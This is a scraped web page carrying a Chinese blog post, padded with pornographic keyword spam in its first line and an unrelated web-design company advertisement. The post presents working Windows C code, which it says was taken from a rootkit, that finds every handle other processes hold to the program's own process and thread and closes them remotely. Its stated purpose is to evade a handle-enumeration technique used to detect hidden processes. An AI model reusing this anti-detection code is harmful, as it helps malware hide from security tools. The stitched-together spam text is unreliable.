av激情亚洲男人的天堂国语,日韩欧美精品一中文字幕,无码av一区二区三区无码,国产又色又爽又刺激的a片,国产又色又爽又刺激的a片

抹掉所有進(jìn)程中自己的句柄

抹掉所有進(jìn)程中自己的句柄

創(chuàng)新互聯(lián)服務(wù)項(xiàng)目包括興安網(wǎng)站建設(shè)、興安網(wǎng)站制作、興安網(wǎng)頁(yè)制作以及興安網(wǎng)絡(luò)營(yíng)銷策劃等。多年來(lái),我們專注于互聯(lián)網(wǎng)行業(yè),利用自身積累的技術(shù)優(yōu)勢(shì)、行業(yè)經(jīng)驗(yàn)、深度合作伙伴關(guān)系等,向廣大中小型企業(yè)、政府機(jī)構(gòu)等提供互聯(lián)網(wǎng)行業(yè)的解決方案,興安網(wǎng)站推廣取得了明顯的社會(huì)效益與經(jīng)濟(jì)效益。目前,我們服務(wù)的客戶以成都為中心已經(jīng)輻射到興安省份的部分城市,未來(lái)相信會(huì)繼續(xù)擴(kuò)大服務(wù)區(qū)域并繼續(xù)獲得客戶的支持與信任!

之前聽(tīng)過(guò)一個(gè)檢測(cè)進(jìn)程的想法,就是暴力枚舉所有進(jìn)程中的handle,查找其中類型為PROCESS的.

此法也被爐子牛用于他的LzOpenProcess().

下面我就寫(xiě)了一斷代碼來(lái)對(duì)抗這個(gè)方法,純屬小伎倆,牛牛們飄過(guò)~

嚴(yán)格說(shuō),此段代碼不算原創(chuàng),是從某rootkit的bin中扒出來(lái)的,因此基本保留其原貌,經(jīng)我修改測(cè)試,主要函數(shù)如下: 

void CloseAllmyHandles() 
{ 
   
  HANDLE hCurProcess,hSouceProcessHandle,hTargetHandle; 
  HANDLE hMyProcess=INVALID_HANDLE_VALUE,hMyThread=INVALID_HANDLE_VALUE; 
  DWORD pid,nBufferLen=0x40000,nRetnLen=0; 
  DWORD HandleCnt,NumberOfHandles; 
  DWORD pMyProcessObject = 0,pMyThreadObject = 0,pObject; 
  CLIENT_ID myCid,tmpCid; 
  PVOID pBuffer = NULL; 
  NTSTATUS status; 
  OBJECT_ATTRIBUTES  ObjectAttributes; 
  myCid.UniqueProcess =(HANDLE)my_GetProcessId(); 
  myCid.UniqueThread=(HANDLE)my_GetThreadId(); 
  InitializeObjectAttributes( &ObjectAttributes, NULL, 0, NULL, NULL ); 
  ZwOpenProcess(&hMyProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &myCid); 
  ZwOpenThread(&hMyThread, PROCESS_ALL_ACCESS, &ObjectAttributes, &myCid); 
  printf("hMyProcess:0x%08x\n",hMyProcess); 
  printf("hMyThread :0x%08x\n",hMyThread); 
  hCurProcess = GetCurrentProcess(); 
  status=ZwAllocateVirtualMemory(hCurProcess, &pBuffer, 0, &nBufferLen, MEM_COMMIT,PAGE_READWRITE); 
  if (!NT_SUCCESS(status)) 
  { 
    printf("Alloc Memory failed.\n"); 
    return; 
  } 
  printf("Alloced Buffer:0x%08X\n",pBuffer); 
  ZwQuerySystemInformation(SystemHandleInformation, pBuffer, nBufferLen, &nRetnLen);// 16=SystemHandleInformation 
  printf("Searching handles...\n"); 
  HandleCnt=*(DWORD *)pBuffer; 
  printf("Handle Count:%d\n",HandleCnt); 
  if (HandleCnt>1) 
  { 
    NumberOfHandles=*(DWORD*)pBuffer; 
    pHandleInfo=(PSYSTEM_HANDLE_TABLE_ENTRY_INFO)((char*)pBuffer+sizeof(DWORD)); 
    do 
    {                                                 
      //printf("HandleValue:0x%08X\n",pHandleInfo->HandleValue); 
      if ( pHandleInfo->HandleValue==(USHORT)hMyThread ) 
    { 
        if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess ) 
        { 
          pMyThreadObject = *(DWORD*)&(pHandleInfo->Object); 
          printf("Thread  finded\n"); 
        } 
      } 
      if (pHandleInfo->HandleValue==(USHORT)hMyProcess ) 
      { 
        if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess) 
        { 
          pMyProcessObject =*(DWORD*)&(pHandleInfo->Object); 
          printf("Process finded\n"); 
        } 
      } 
      ++pHandleInfo; 
      --NumberOfHandles; 
     
    } 
    while ( NumberOfHandles ); 
  } 
  ZwClose(hMyThread); 
  ZwClose(hMyProcess); 
  printf("Found my object ok.\nBegin Search and Close...\n"); 
  NumberOfHandles=HandleCnt; 
  if (HandleCnt>=1 ) 
  { 
  pHandleInfo=(PSYSTEM_HANDLE_TABLE_ENTRY_INFO)((char*)pBuffer+sizeof(DWORD)); 
    do 
    { 
      pObject = *(DWORD*)&(pHandleInfo->Object); 
     
      if ( pMyProcessObject == pObject || pMyThreadObject == pObject ) 
      { 
        printf("Found Handle=0x%08X OwnerPID=%4d\n",pHandleInfo->HandleValue,pHandleInfo->UniqueProcessId); 
      tmpCid.UniqueProcess= (HANDLE)pHandleInfo->UniqueProcessId; 
      tmpCid.UniqueThread=0; 
      InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL ); 
      status=ZwOpenProcess(&hSouceProcessHandle, PROCESS_DUP_HANDLE, &ObjectAttributes, &tmpCid); 
        //PrintZwError("ZwOpenProcess",status); 
        if (!status) 
        { 
    status=ZwDuplicateObject( 
            hSouceProcessHandle, 
            (void*)pHandleInfo->HandleValue, 
            hCurProcess, 
            &hTargetHandle, 
            0, 
            0, 
                DUPLICATE_CLOSE_SOURCE); 

  if ( !status) 
          { 
            ZwClose(hTargetHandle); 
            printf("Handle closed!\n"); 
          } 
      //PrintZwError("ZwDuplicateObject",status); 
          ZwClose(hSouceProcessHandle); 
        } 
      } 
      ++pHandleInfo; 
      --NumberOfHandles; 
    } 
    while ( NumberOfHandles ); 
  } 
  ZwFreeVirtualMemory(hCurProcess, &pBuffer, &nBufferLen, MEM_RELEASE); 
}

文章標(biāo)題:抹掉所有進(jìn)程中自己的句柄
鏈接分享:http://uogjgqi.cn/article/dhpgdhi.html
掃二維碼與項(xiàng)目經(jīng)理溝通

我們?cè)谖⑿派?4小時(shí)期待你的聲音

解答本文疑問(wèn)/技術(shù)咨詢/運(yùn)營(yíng)咨詢/技術(shù)建議/互聯(lián)網(wǎng)交流